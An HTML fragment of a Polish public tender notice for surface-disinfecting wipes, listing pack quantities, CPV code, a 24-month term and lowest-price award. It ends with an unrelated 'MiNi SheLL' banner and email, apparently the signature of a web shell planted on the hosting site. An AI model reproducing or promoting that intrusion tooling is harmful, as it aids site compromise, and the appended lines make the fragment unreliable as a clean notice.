<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1 Chusteczki do dezynfekowania powierzchni poprzez przecieranie na bazie alkoholu. Spektrum działania: B (Mycobacteria), F, V (HBS, HIV, HCV, Rota, Adeno, Vaccina, Papowa, Noro, Polio). Czas aktywacji 1 minuta. Opakowania z dozownikiem oraz opakowania uzupełniające		
	tuba 100szt	12	op.
	wkład 100szt.	60	op.
2 Gotowe do użycia, przeznaczone do szybkiej dezynfekcji powierzchni i sprzętów medycznych, chusteczki nie zawierające alkoholu, aldehydów i fenoli. Posiadające właściwości myjące, o przyjemnym zapach. Spektrum działania po 1 minucie: B,  F, V (HBV, HIV, HCV, Rota, Vacina). Opakowanie z dozownikiem oraz opakowanie uzupełniające. 		
	tuba 100szt	12	op.
	wkład 100szt.	60	op..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.63.16.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com